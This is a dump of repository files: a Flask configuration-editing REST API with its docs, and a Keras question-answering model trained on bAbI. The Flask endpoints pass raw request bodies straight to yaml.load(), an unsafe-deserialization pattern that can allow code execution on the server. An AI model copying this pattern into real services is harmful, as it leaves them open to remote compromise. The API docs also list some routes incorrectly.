"license_type": "permissive",
"max_line_length": 56,
"num_lines": 52,
"path": "/App/FlaskErrorHandler.py",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Intro: 错误处理信息返回模块\n# Author: Ztj\n# Email: [email protected]\n\nimport yaml.scanner\n\nfrom .Env import *\n\n\nclass FlaskErrorHandler:\n \"\"\"错误处理对象\"\"\"\n\n @staticmethod\n @FlaskApp.errorhandler(404)\n def error_handler_exception(ex):\n return str('接口不存在'), 404\n\n @staticmethod\n @FlaskApp.errorhandler(Excepts.CursorNotExist)\n def error_handler_exception(ex):\n return str('游标不存在'), 404\n\n @staticmethod\n @FlaskApp.errorhandler(Excepts.CursorExisting)\n def error_handler_exception(ex):\n return str('游标已经存在'), 404\n\n @staticmethod\n @FlaskApp.errorhandler(Excepts.KeyNotExist)\n def error_handler_exception(ex):\n return str('键不存在'), 404\n\n @staticmethod\n @FlaskApp.errorhandler(json.decoder.JSONDecodeError)\n def error_handler_exception(ex):\n return str('JSON 解析错误'), 500\n\n @staticmethod\n @FlaskApp.errorhandler(yaml.scanner.ScannerError)\n def error_handler_exception(ex):\n return str('YAML 解析错误'), 500\n\n @staticmethod\n @FlaskApp.errorhandler(yaml.scanner.ScannerError)\n def error_handler_exception(ex):\n return str('YAML 解析错误'), 500\n\n @staticmethod\n @FlaskApp.errorhandler(Excepts.RequestShort)\n def error_handler_exception(ex):\n return str('缺失请求参数 %s' % ex), 400\n"
},
{
"alpha_fraction": 0.5830485224723816,
"alphanum_fraction": 0.5857826471328735,
"avg_line_length": 26.60377311706543,
"blob_id": "7fda9632d1f6fae1aec1b2cf94a93a57fdb4b4bd",
"content_id": "e183427fc8c5f78c7f78776bfe011f0ccfbb6971",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1515,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 53,
"path": "/App/ApiBase.py",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Intro: 基本接口模块\n# Author: Ztj\n# Email: [email protected]\n\nimport threading\n\nfrom .Env import *\n\n\nclass ApiBase:\n \"\"\"基本接口\"\"\"\n\n @staticmethod\n @FlaskApp.before_first_request\n def memory_clear_listen():\n \"\"\"内存清理监听\"\"\"\n threading.Thread(target=MemoryData.clear_listen, args=()).start()\n\n @staticmethod\n @FlaskApp.route('/', methods=['GET', 'POST'])\n def api_root():\n return 'ok'\n\n @staticmethod\n @FlaskApp.route('/init', methods=['GET', 'POST'])\n def cursor_init():\n \"\"\"初始化游标\"\"\"\n delimiter = str(flask.request.values.get('delimiter', '.'))\n expire = int(flask.request.values.get('expire', 300))\n\n cursor_id = MemoryData.init_cursor(delimiter)\n MemoryData.set_cursor_expire(cursor_id, expire)\n\n return str(cursor_id)\n\n @staticmethod\n @FlaskApp.route('/env_to_ini', methods=['GET', 'POST'])\n def env_to_ini():\n \"\"\"初始化游标\"\"\"\n prefix = flask.request.values.get('prefix')\n delimiter = str(flask.request.values.get('delimiter', '_'))\n section_lower = bool(flask.request.values.get('section_lower', False))\n key_lower = bool(flask.request.values.get('key_lower', False))\n env_str = str(flask.request.get_data().decode())\n\n return Libs.env_to_ini(\n env_str,\n prefix=prefix,\n delimiter=delimiter,\n section_lower=section_lower,\n key_lower=key_lower\n )\n"
},
{
"alpha_fraction": 0.7309562563896179,
"alphanum_fraction": 0.7487844228744507,
"avg_line_length": 25.826086044311523,
"blob_id": "33988a38b584c805da955122716fa6a146a1f51e",
"content_id": "3d1ed9e3cfd150452236c02139cfd883c60ad1f6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 625,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 23,
"path": "/main.py",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Intro: 入口模块\n# Author: Ztj\n# Email: [email protected]\n\nimport os\n\nfrom App.ApiBase import ApiBase\nfrom App.ApiCursor import CursorBlueprint\nfrom App.ApiMonitor import MonitorBlueprint\nfrom App.Env import *\nfrom App.FlaskErrorHandler import FlaskErrorHandler\n\nApiBase = ApiBase\nFlaskErrorHandler = FlaskErrorHandler\n\nFLASK_HOST = os.getenv(\"FLASK_HOST\", \"127.0.0.1\")\nFLASK_PORT = os.getenv(\"FLASK_PORT\", 5000)\n\nif __name__ == '__main__':\n FlaskApp.register_blueprint(CursorBlueprint)\n FlaskApp.register_blueprint(MonitorBlueprint)\n FlaskApp.run(host=FLASK_HOST, port=FLASK_PORT, threaded=True)\n"
},
{
"alpha_fraction": 0.7154046893119812,
"alphanum_fraction": 0.7180156707763672,
"avg_line_length": 12.206896781921387,
"blob_id": "74bf3c57df1a1cab130f5ae5c32cf4ee2103c4d1",
"content_id": "9e1815198375e03656b4b57de42c0043b3441ebb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 391,
"license_type": "permissive",
"max_line_length": 34,
"num_lines": 29,
"path": "/App/Env.py",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Intro: 环境模块\n# Author: Ztj\n# Email: [email protected]\n\nimport json\nimport time\nimport uuid\n\nimport flask\nimport registry\nimport yaml\n\nfrom . import Excepts\nfrom . import Libs\nfrom .MemoryData import MemoryData\n\njson = json\nuuid = uuid\ntime = time\n\nyaml = yaml\nregistry = registry\n\nMemoryData = MemoryData()\nExcepts = Excepts\nLibs = Libs\n\nFlaskApp = flask.Flask('APP')\n"
},
{
"alpha_fraction": 0.5407782793045044,
"alphanum_fraction": 0.5439765453338623,
"avg_line_length": 27.86153793334961,
"blob_id": "2df69d05d8226565ede8798a020cf9d566982451",
"content_id": "dd940cf4be1292d2d871d828da7d9d5d490fbca7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3854,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 130,
"path": "/App/ApiCursor.py",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Intro: 游标接口模块\n# Author: Ztj\n# Email: [email protected]\n\nfrom .Env import *\n\nCursorBlueprint = flask.Blueprint('ApiCursor', __name__, url_prefix='/<int:cursor_id>')\n\n\nclass ApiCursor:\n \"\"\"游标接口\"\"\"\n\n @staticmethod\n def req_key():\n \"\"\"请求键\"\"\"\n key = flask.request.values.get('key')\n if key is None:\n raise Excepts.RequestShort('key')\n return key\n\n @staticmethod\n def req_data(data_type):\n \"\"\"请求数据\"\"\"\n if data_type == 'str':\n val = str(flask.request.get_data().decode())\n elif data_type == 'int':\n val = int(flask.request.get_data().decode())\n elif data_type == 'bool':\n val = flask.request.get_data().decode()\n val = True if val == 'true' else False\n elif data_type == 'json':\n val = json.loads(flask.request.get_data())\n elif data_type == 'yaml':\n val = yaml.load(flask.request.get_data())\n else:\n val = flask.request.get_data().decode()\n return val\n\n @staticmethod\n @CursorBlueprint.url_value_preprocessor\n def init_cursor_target(endpoint, values):\n \"\"\"初始化游标数据\"\"\"\n cursor_id = values.pop('cursor_id')\n flask.g.cursor_target = MemoryData.get_cursor_target(cursor_id)\n\n @staticmethod\n @CursorBlueprint.route('/set/<data_type>', methods=['GET', 'POST'])\n def set(data_type):\n \"\"\"设置数据\"\"\"\n key = ApiCursor.req_key()\n data = ApiCursor.req_data(data_type)\n\n flask.g.cursor_target.set(key, data)\n return 'ok'\n\n @staticmethod\n @CursorBlueprint.route('/append/<data_type>', methods=['GET', 'POST'])\n def append(data_type):\n \"\"\"追加数据\"\"\"\n key = ApiCursor.req_key()\n data = ApiCursor.req_data(data_type)\n\n flask.g.cursor_target.append(key, data)\n return 'ok'\n\n @staticmethod\n @CursorBlueprint.route('/unset', methods=['GET', 'POST'])\n def unset():\n \"\"\"删除数据\"\"\"\n key = ApiCursor.req_key()\n flask.g.cursor_target.unset(key, clear=True)\n return 'ok'\n\n @staticmethod\n @CursorBlueprint.route('/get/<data_type>', methods=['GET', 'POST'])\n def get(data_type):\n \"\"\"获取数据\"\"\"\n key = ApiCursor.req_key()\n val = flask.g.cursor_target.get(key)\n\n if data_type == 'json':\n return json.dumps(val, indent=4)\n elif data_type == 'yaml':\n return yaml.dump(val)\n elif data_type == 'str':\n return str(val)\n else:\n raise flask.abort(404)\n\n @staticmethod\n @CursorBlueprint.route('/output/<data_type>', methods=['GET', 'POST'])\n def output(data_type):\n \"\"\"输出数据\"\"\"\n val = flask.g.cursor_target.get()\n\n if data_type == 'json':\n return json.dumps(val, indent=4)\n elif data_type == 'yaml':\n return yaml.dump(val)\n else:\n raise flask.abort(404)\n\n @staticmethod\n @CursorBlueprint.route('/load/<data_type>', methods=['GET', 'POST'])\n def load(data_type):\n \"\"\"加载数据\"\"\"\n if data_type == 'json':\n data = json.loads(flask.request.get_data())\n elif data_type == 'yaml':\n data = yaml.load(flask.request.get_data())\n else:\n raise flask.abort(404)\n\n flask.g.cursor_target.load(data)\n return 'ok'\n\n @staticmethod\n @CursorBlueprint.route('/key/<operator>', methods=['GET', 'POST'])\n def key(operator):\n \"\"\"键操作\"\"\"\n key = ApiCursor.req_key()\n val = flask.g.cursor_target.get(key)\n\n if val is None:\n raise Excepts.KeyNotExist()\n elif operator == 'exist':\n return 'ok'\n elif operator == 'type':\n return type(val)\n"
},
{
"alpha_fraction": 0.6103174686431885,
"alphanum_fraction": 0.6103174686431885,
"avg_line_length": 15.15384578704834,
"blob_id": "ca42dccc6b988b67fcb1ad38b5fc75c426a55ee8",
"content_id": "c97753f9e9ada716f264e163b2beabb25d93b846",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1856,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 78,
"path": "/Docs/Api.md",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# 接口文档\n\n## 快速预览\n```\n初始配置:/init\n加载数据:/<cursor_id>/load/<data_type>\n设置数据:/<cursor_id>/set/<data_type>\n追加数据:/<cursor_id>/append/<data_type>\n删除数据:/<cursor_id>/unset\n获取数据:/<cursor_id>/get/<data_type>\n输出数据:/<cursor_id>/set/<data_type>\n```\n\n## 详细说明\n\n### 初始配置\n- 接口路径:/init\n- 返回数据:游标编号 (cursor_id)\n\n### 加载数据\n- 接口路径:/<cursor_id>/load/<data_type>\n- 返回数据:ok\n\n参数名|类型|必填|说明\n---|---|---|---\ncursor_id|path|是|游标编号\ndata_type|path|是|数据类型,支持 json, yaml\n-|data|是|数据\n\n### 设置数据\n- 接口路径:/<cursor_id>/set/<data_type>\n- 返回数据:ok\n\n参数名|类型|必填|说明\n---|---|---|---\ncursor_id|path|是|游标编号\ndata_type|path|是|数据类型,支持 json, yaml, str, bool\nkey|query|是|键\n-|data|是|数据\n\n### 追加数据\n- 接口路径:/<cursor_id>/append/<data_type>\n- 返回数据:ok\n\n参数名|类型|必填|说明\n---|---|---|---\ncursor_id|path|是|游标编号\ndata_type|path|是|数据类型,支持 json, yaml, str, bool\nkey|query|是|键\n-|data|是|数据\n\n### 删除数据\n- 接口路径:/<cursor_id>/unset\n- 返回数据:ok\n\n参数名|类型|必填|说明\n---|---|---|---\ncursor_id|path|是|游标编号\nkey|query|是|键\n\n### 获取数据\n- 接口路径:/<cursor_id>/set/<data_type>\n- 返回数据:根据 <data_type> 返回\n\n参数名|类型|必填|说明\n---|---|---|---\ncursor_id|path|是|游标编号\ndata_type|path|是|数据类型,支持 json, yaml, str\nkey|query|是|键\n\n### 输出数据\n- 接口路径:/<cursor_id>/set/<data_type>\n- 返回数据:根据 <data_type> 返回\n\n参数名|类型|必填|说明\n---|---|---|---\ncursor_id|path|是|游标编号\ndata_type|path|是|数据类型,支持 json, yaml\n"
},
{
"alpha_fraction": 0.5757575631141663,
"alphanum_fraction": 0.6339802742004395,
"avg_line_length": 21.592308044433594,
"blob_id": "060bf8feb31186d3e620b9b21192597760676ce1",
"content_id": "e8f3142b33c70725c685870c8feeca25e7cb0440",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3455,
"license_type": "permissive",
"max_line_length": 104,
"num_lines": 130,
"path": "/README.md",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# Config Api\n\n这是一个 config restful api 接口。\n\n主要解决在命令行下操作 json, yaml, ini 等配置文件问题。\n\n## 项目功能\n- 通过 API 接口操作配置文件\n- 支持 JSON, YAML 配置文件的增删改查\n- 输出 JSON, YAML 配置文件\n- 支持将环境变量转为 INI 配置文件\n\n## 项目地址\n- Github(国外):https://github.com/ztj1993/config-api.git\n- Gitee(国内):https://gitee.com/zhangtianjie/config-api.git\n\n## 项目运行\n```\npip install -r requirements.txt\npython main.py\n```\n\n```\ndocker pull ztj1993/config-api\ndocker run -d --name config-api -p 5000:5000 ztj1993/config-api\n```\n\n## 使用示例\n\n> JSON 配置文件操作示例\n\n```\n$ uri=http://127.0.0.1:5000\n\n$ #获取配置原始数据\n$ data=$(cat /etc/docker/daemon.json) && echo ${data}\n\n {\n \"registry-mirrors\": [\"http://ef017c13.m.daocloud.io\"]\n }\n\n$ #初始化配置游标\n$ cursor_id=$(curl -fsS ${uri}/init) && echo ${cursor_id}\n\n 158853936809905161020585456234816085535\n\n$ cursor_uri=${uri}/${cursor_id}\n\n$ #将配置上传到游标\n$ curl ${cursor_uri}/load/json -d \"${data}\"\n\n ok\n\n$ #操作配置\n$ curl -H \"Content-Type: text/plain\" ${cursor_uri}/set/bool?key=tlsverify -d \"true\"\n$ curl -H \"Content-Type: text/plain\" ${cursor_uri}/set/str?key=tlscacert -d \"/etc/certs/ca.pem\"\n$ curl -H \"Content-Type: text/plain\" ${cursor_uri}/set/str?key=tlscert -d \"/etc/certs/server-cert.pem\"\n$ curl -H \"Content-Type: text/plain\" ${cursor_uri}/set/str?key=tlskey -d \"/etc/certs/server-key.pem\"\n$ curl -H \"Content-Type: text/plain\" ${cursor_uri}/append/str?key=hosts -d \"tcp://0.0.0.0:2376\"\n$ curl -H \"Content-Type: text/plain\" ${cursor_uri}/append/str?key=hosts -d \"unix:///var/run/docker.sock\"\n\n ok\n\n$ #输出配置\n$ curl ${cursor_uri}/output/json\n\n {\n \"registry-mirrors\": [\n \"http://ef017c13.m.daocloud.io\"\n ],\n \"tlsverify\": true,\n \"tlscacert\": \"/etc/certs/ca.pem\",\n \"tlscert\": \"/etc/certs/server-cert.pem\",\n \"tlskey\": \"/etc/certs/server-key.pem\",\n \"hosts\": [\n \"tcp://0.0.0.0:2376\",\n \"unix:///var/run/docker.sock\"\n ]\n }\n\n```\n\n> 环境变量生成 INI 配置文件示例\n\n```\n$ export FRP_COMMON_SERVER_ADDR=0.0.0.0\n$ export FRP_COMMON_BIND_PORT=7000\n$ export FRP_SSH_TYPE=tcp\n$ export FRP_SSH_LOCAL_IP=127.0.0.1\n$ export FRP_SSH_LOCAL_PORT=22\n$ export FRP_SSH_REMOTE_PORT=6000\n\n$ data=$(env | grep FRP) && echo \"${data}\"\n\n FRP_COMMON_SERVER_ADDR=0.0.0.0\n FRP_COMMON_BIND_PORT=7000\n FRP_SSH_TYPE=tcp\n FRP_SSH_LOCAL_IP=127.0.0.1\n FRP_SSH_LOCAL_PORT=22\n FRP_SSH_REMOTE_PORT=6000\n\n$ query_args=\"prefix=FRP&delimiter=_§ion_lower=1&key_lower=1\"\n$ curl -H \"Content-Type: text/plain\" http://127.0.0.1:5000/env_to_ini?${query_args} -d \"${data}\"\n\n [common]\n server_addr = 0.0.0.0\n bind_port = 7000\n\n [ssh]\n local_ip = 127.0.0.1\n remote_port = 6000\n local_port = 22\n type = tcp\n\n```\n\n## 文档说明\n- [接口文档](Docs/Api.md)\n\n## TODO\n- 数据请求长度限制\n- 游标数据大小限制\n- 引入环境变量支持\n- 改善部署方式\n\n## 项目贡献\n本项目是一个开源项目,欢迎任何人为其开发和进步贡献力量。\n- 在使用过程中出现任何问题,请通过 [Issue](https://github.com/ztj1993/config-api/issues) 反馈\n- Bug 修复可以直接提交 Pull Request 到 develop 分支\n- 如果您有任何其他方面的问题,欢迎邮件至 [email protected] 交流\n"
}
] | 14 |
HimaniChanchal/QuestionAnsweringBasedSystem
|
https://github.com/HimaniChanchal/QuestionAnsweringBasedSystem
|
34f6829f28c791be66d23543881e769a0e38fde9
|
33655a461791231fb6775f8d6afde0cd83e9edb7
|
6420a291d72e2e24e1dd4c9cfaf1794d5abfe7fa
|
refs/heads/master
| 2019-07-08T04:17:14.148388 | 2017-04-17T11:52:59 | 2017-04-17T11:52:59 | 88,317,802 | 1 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.63907390832901,
"alphanum_fraction": 0.6512845158576965,
"avg_line_length": 39.02857208251953,
"blob_id": "8e005559c26cf5272547bc504a67c745d239ef3d",
"content_id": "9774c915d7b7920d0d4892ca36843a278376659d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12612,
"license_type": "no_license",
"max_line_length": 295,
"num_lines": 315,
"path": "/Code/test.py",
"repo_name": "HimaniChanchal/QuestionAnsweringBasedSystem",
"src_encoding": "UTF-8",
"text": "'''This Code will train Network on bAbi Dataset.\nPapers on which this code is based on are:\n- Jason Weston, Antoine Bordes, Sumit Chopra, Tomas Mikolov, Alexander M. Rush,\n \"Towards AI-Complete Question Answering: A Set of Prerequisite Toy Tasks\",\n http://arxiv.org/abs/1502.05698\n- Sainbayar Sukhbaatar, Arthur Szlam, Jason Weston, Rob Fergus,\n \"End-To-End Memory Networks\",\n http://arxiv.org/abs/1503.08895\nIt gains 98.6% accuracy on task 'single_supporting_fact_10k' at 700 epochs, using RELU as a activation function, and when we used Sigmoid as a Activation function we need more Epoch as compared to RELU i.e at Epoch 600 we got only 60% accuracy.\n\n'''\nfrom __future__ import print_function\nimport tarfile\nimport numpy as np\nimport re\nfrom keras.preprocessing.sequence import pad_sequences\nfrom functools import reduce\nfrom keras.models import Sequential, Model\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers import Input, Activation, Dense, Permute, Dropout, add, dot, concatenate\nfrom keras.layers import LSTM\nfrom keras.utils.data_utils import get_file\n\n\n'''\nThis function will parse the stories of the bAbi dataset, Only the sentences that support the answer are kept and rest are discared.\n\n'''\n\ndef pruning(Totalline, only_supporting=False):\n \n TotalDataSet = []\n StoryDataSet = []\n for line in Totalline:\n \n line = line.decode('utf-8').strip()\n \n \n nid, line = line.split(' ', 1) #Where is Daniel? garden 11 i.e All lines will come here. including question and answer\n #line.split(' ',1), split line on spaces, keep 1st element in nid and after space in line.\n\n nid = int(nid) #15 i.e line number\n if nid == 1: #only 1st line is kept in story dataset.\n StoryDataSet = []\n if '\\t' in line: #It willl take only Question line, because only question line will contain tab.\n \n q, a, supporting = line.split('\\t')\n #print('line' ,line) #line Where is John? \tbedroom\t8\n #print('question' ,q) #question Where is John? \n #print('answer' ,a) #answer bedroom\n #print('supporting' ,supporting) #supporting 8\n\n q = tokenize(q)\n #print('Question', q)#Question [u'Where', u'is', u'John', u'?']\n\n substory = None\n if only_supporting:\n # Only select the related substory\n supporting = map(int, supporting.split())\n substory = [StoryDataSet[i - 1] for i in supporting]\n else:\n # Provide all the substories\n substory = [x for x in StoryDataSet if x]\n TotalDataSet.append((substory, q, a))\n StoryDataSet.append('')\n else:\n Sentence = tokenize(line)\n #print('sentence' , Sentence) #sentence [u'Daniel', u'journeyed', u'to', u'the', u'garden', u'.']\n\n StoryDataSet.append(Sentence)#append each sentence in StoryDataSet.\n return TotalDataSet\n\n\n\n\n'''\nconvert stories , Questions , Answers in a vector form, AnswerArray will contain an array of size equal to the vocabulary size , initially we fill all entries of this array as Zero and then we will find place 1 at those indexes that contain answer index... i.e here DataArray array will contain\nStories i.e in vectorize form, QuestionArray will contain Questions, and About AnswerArray I explained Earlier....At the end of this function we have different arrays of Stories, Question, Answer that we will feed to neural Network. 
\n\n'''\ndef vectorize_stories(TotalDataSet, vocabularyId, story_maxlen, query_maxlen):\n DataArray = []\n QuestionArray = []\n AnswerArray = []\n for StoryDataSet, query, answer in TotalDataSet:\n \n dataarray = [vocabularyId[w] for w in StoryDataSet]\n \n queryarray = [VocabularyId[w] for w in query]\n # let's not forget that index 0 is reserved\n answerarray = np.zeros(len(VocabularyId) + 1)\n \n answerarray[VocabularyId[answer]] = 1\n \n\n DataArray.append(dataarray)\n QuestionArray.append(queryarray)\n AnswerArray.append(answerarray)\n # print('DataArray>>>' , DataArray)\n # print('QuestionArray>>>' ,QuestionArray)\n # print('AnswerArray>>>' , AnswerArray)\n \n \n return (pad_sequences(DataArray, maxlen=story_maxlength),\n pad_sequences(QuestionArray, maxlen=query_maxlength), np.array(AnswerArray))\n\n\n\n''' This function will return tokenize the sentence E.g. tokenize('Jaya went to the temple. Where does Jaya gone?')\n['Jaya' , 'went' , 'to' , 'the' , 'temple' , '.' ,'Where' , 'does' , 'Jaya' , 'gone' , '?' ]\n\n'''\n\n\ndef tokenize(Sentence):\n \n return [x.strip() for x in re.split('(\\W+)?', Sentence) if x.strip()] \n\n'''\nThis function will convert all the sentences of a given file into a single story , also stories longer than maximum length are pruned.\n'''\ndef get_stories(f, only_supporting=False, max_length=None):\n \n TotalDataSet = pruning(f.readlines(), only_supporting=only_supporting)\n \n flatten = lambda TotalDataSet: reduce(lambda x, y: x + y, TotalDataSet)\n TotalDataSet = [(flatten(StoryDataSet), q, answer) for StoryDataSet, q, answer in TotalDataSet if not max_length or len(flatten(StoryDataSet)) < max_length]\n return TotalDataSet\n\n\n\n'''\nDownload the babi Dataset and take the path where it is being stored and do rest work on it\n'''\ntry:\n path = get_file('babi-tasks-v1-2.tar.gz', origin='https://s3.amazonaws.com/text-datasets/babi_tasks_1-20_v1-2.tar.gz')\nexcept:\n print('Error downloading dataset, please download it manually:\\n'\n '$ wget http://www.thespermwhale.com/jaseweston/babi/tasks_1-20_v1-2.tar.gz\\n'\n '$ mv tasks_1-20_v1-2.tar.gz ~/.keras/datasets/babi-tasks-v1-2.tar.gz')\n raise\ntar = tarfile.open(path)\n\n\nchallenges = {\n # QA1 with 10,000 samples\n 'single_supporting_fact_10k': 'tasks_1-20_v1-2/en-10k/qa1_single-supporting-fact_{}.txt',\n # QA2 with 10,000 samples\n 'two_supporting_facts_10k': 'tasks_1-20_v1-2/en-10k/qa2_two-supporting-facts_{}.txt',\n}\nchallenge_type = 'single_supporting_fact_10k'\nchallenge = challenges[challenge_type]\n\nprint('Extracting stories for the challenge:', challenge_type)\ntrain_stories = get_stories(tar.extractfile(challenge.format('train')))\ntest_stories = get_stories(tar.extractfile(challenge.format('test')))\n\n\nvocabulary= set()\nfor StoryDataSet, q, answer in train_stories + test_stories:\n vocabulary |= set(StoryDataSet + q + [answer])\nvocabulary = sorted(vocabulary)\n\n\n# Reserve 0 for masking via pad_sequences\nvocabulary_size = len(vocabulary) + 1\nstory_maxlength = max(map(len, (x for x, _, _ in train_stories + test_stories)))\nquery_maxlength = max(map(len, (x for _, x, _ in train_stories + test_stories)))\n\n\n'''\nprint('---->>')\nprint('Vocabulary size>>>', vocabulary_size, 'unique words')\nprint('maximum length of storY>>>', story_maxlength, 'words')\nprint('maximum length of story>>>', query_maxlength, 'words')\nprint('Number of training stories>>>', len(train_stories))\nprint('Number of test stories>>>', len(test_stories))\nprint('total vocabulary>>>' , 
vocabulary)\nprint('<<---')\n\nprint(train_stories[0])\nprint('<<<----')\nprint('***************On Vectorizing Word Sequences*************')\n\n'''\n\nVocabularyId = dict((c, i + 1) for i, c in enumerate(vocabulary))\n# id for the words of story,id for the words of query, array Y contain a value of 1 at the position of answer index\ninputs_train, queries_train, answers_train = vectorize_stories(train_stories,\n VocabularyId,\n story_maxlength,\n query_maxlength)\n# id for the test story, id for the query, array Y contain a value 1 at the position index of answer\ninputs_test, queries_test, answers_test = vectorize_stories(test_stories,\n VocabularyId,\n story_maxlength,\n query_maxlength)\n\n\n'''\nprint('--->>>')\nprint('inputs: integer tensor of shape (samples, max_length)')\nprint('inputs_train shape--->>>', inputs_train.shape)\nprint('inputs_test shape--->>>', inputs_test.shape)\nprint('-')\nprint('queries: integer tensor of shape (samples, max_length)')\nprint('queries_train shape--->>>', queries_train.shape)\nprint('queries_test shape--->>>', queries_test.shape)\nprint('-')\nprint('answers: binary (1 or 0) tensor of shape (samples, vocabulary_size)')\nprint('answers_train shape:', answers_train.shape)\nprint('answers_test shape:', answers_test.shape)\nprint('<<<---')\nprint('*************************Compiling*************************')\n'''\n # Create Tensor Object That will be used in making Model and training on it.\ninput_sequence = Input((story_maxlength,))\nquestion = Input((query_maxlength,))\n\n\n# sequential encoder is used for encoding.\n# embed the input sequence into a sequence of vectors\ninput_encoder_m = Sequential()\ninput_encoder_m.add(Embedding(input_dim=vocabulary_size,\n output_dim=64))\ninput_encoder_m.add(Dropout(0.7))\n\n# output: (samples, story_maxlen, embedding_dim)\n\n# embed the input into a sequence of vectors of size query_maxlen\ninput_encoder_c = Sequential()\ninput_encoder_c.add(Embedding(input_dim=vocabulary_size,\n output_dim=query_maxlength))\ninput_encoder_c.add(Dropout(0.7))\n# output: (samples, story_maxlen, query_maxlen)\n\n# embed the question into a sequence of vectors\nquestion_encoder = Sequential()\nquestion_encoder.add(Embedding(input_dim=vocabulary_size,\n output_dim=64,\n input_length=query_maxlength))\nquestion_encoder.add(Dropout(0.7))\n# output: (samples, query_maxlen, embedding_dim)\n\n# encode input sequence and questions (which are indices)\n# to sequences of dense vectors\ninput_encoded_m = input_encoder_m(input_sequence)\ninput_encoded_c = input_encoder_c(input_sequence)\nquestion_encoded = question_encoder(question)\n\n\n# compute a 'match' between the first input vector sequence\n# and the question vector sequence\n# shape: `(samples, story_maxlen, query_maxlen)`\nmatch = dot([input_encoded_m, question_encoded], axes=(2, 2))\nmatch = Activation('sigmoid')(match)\n\n# add the match matrix with the second input vector sequence\nresponse = add([match, input_encoded_c]) # (samples, story_maxlen, query_maxlen)\nresponse = Permute((2, 1))(response) # (samples, query_maxlen, story_maxlen)\n\n# concatenate the match matrix with the question vector sequence\nanswer = concatenate([response, question_encoded])\n\n\n\n# we have chosen RNN for reduction.\nanswer = LSTM(32)(answer) # (samples, 32)\n\n# one regularization layer -- more would probably be needed.\nanswer = Dropout(0.3)(answer)\nanswer = Dense(vocabulary_size)(answer) # (samples, vocab_size)\n# we output a probability distribution over the vocabulary\nanswer = 
Activation('sigmoid')(answer)\n\n# build the final model\nmodel = Model([input_sequence, question], answer)\nmodel.compile(optimizer='rmsprop', loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n# train\nhistory = model.fit([inputs_train, queries_train], answers_train,\n batch_size=32,\n epochs=1500,\n \n validation_data=([inputs_test, queries_test], answers_test))\n\n\nprint(history.history.keys())\nimport matplotlib.pyplot as plt\n\n# summarize history for accuracy i.e draw accuracy Vs Epoch graph\nplt.plot(history.history['acc'])\nplt.plot(history.history['val_acc'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n\n#summarize history for Loss i.e draw Loss Vs Epoch graph\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n# import of json for saving model\nimport json\nRemodel = model.to_json() #saving model to Remodel\nwith open('QASYSTEM1500sigmoid.json', 'w') as outfile: #file named as QASYSTEM1500sigmoid.json for saving model\n json.dump(Remodel, outfile) #writing model to file\n\nmodel.save_weights('QASYSTEM1500sigmoid_weights.h5') #saving weights to file named as QASYSTEM1500sigmoid_weights.h5\n\n\n\n"
},
{
"alpha_fraction": 0.7278130054473877,
"alphanum_fraction": 0.7523771524429321,
"avg_line_length": 46.52830123901367,
"blob_id": "e017399a16f280b0627b7c948bf11a798a2d9f93",
"content_id": "83a469080a1b527022fa55f9f87f0d4ddb293a9c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2524,
"license_type": "no_license",
"max_line_length": 317,
"num_lines": 53,
"path": "/README.md",
"repo_name": "HimaniChanchal/QuestionAnsweringBasedSystem",
"src_encoding": "UTF-8",
"text": "# QuestionAnsweringBasedSystem\nThis is an implementation Of Question Answering System on bAbi DataSet\nThis Code will train Network on bAbi Dataset.\nPapers on which this code is based on are:\n- Jason Weston, Antoine Bordes, Sumit Chopra, Tomas Mikolov, Alexander M. Rush,\n \"Towards AI-Complete Question Answering: A Set of Prerequisite Toy Tasks\",\n http://arxiv.org/abs/1502.05698\n- Sainbayar Sukhbaatar, Arthur Szlam, Jason Weston, Rob Fergus,\n \"End-To-End Memory Networks\",\n http://arxiv.org/abs/1503.08895\nIt gains 98.6% accuracy on task 'single_supporting_fact_10k' at 700 epochs, using RELU as a activation function, and when we used Sigmoid as a Activation function we need more Epoch as compared to RELU i.e at Epoch 600 we got only 60% accuracy,But at Epoch 1000 we get 93% accuracy\n\nNow the Methods that we used are:\n\nPruning--->>This function will parse the stories of the bAbi dataset, Only the sentences that support the answer are kept and rest are discared.\n\nvectorize_stories--->>convert stories , Questions , Answers in a vector form, AnswerArray will contain an array of size equal to the vocabulary size , initially we fill all entries of this array as Zero and then we will find place 1 at those indexes that contain answer index... i.e here DataArray array will contain\nStories i.e in vectorize form, QuestionArray will contain Questions, and About AnswerArray I explained Earlier....At the end of this function we have different arrays of Stories, Question, Answer that we will feed to neural 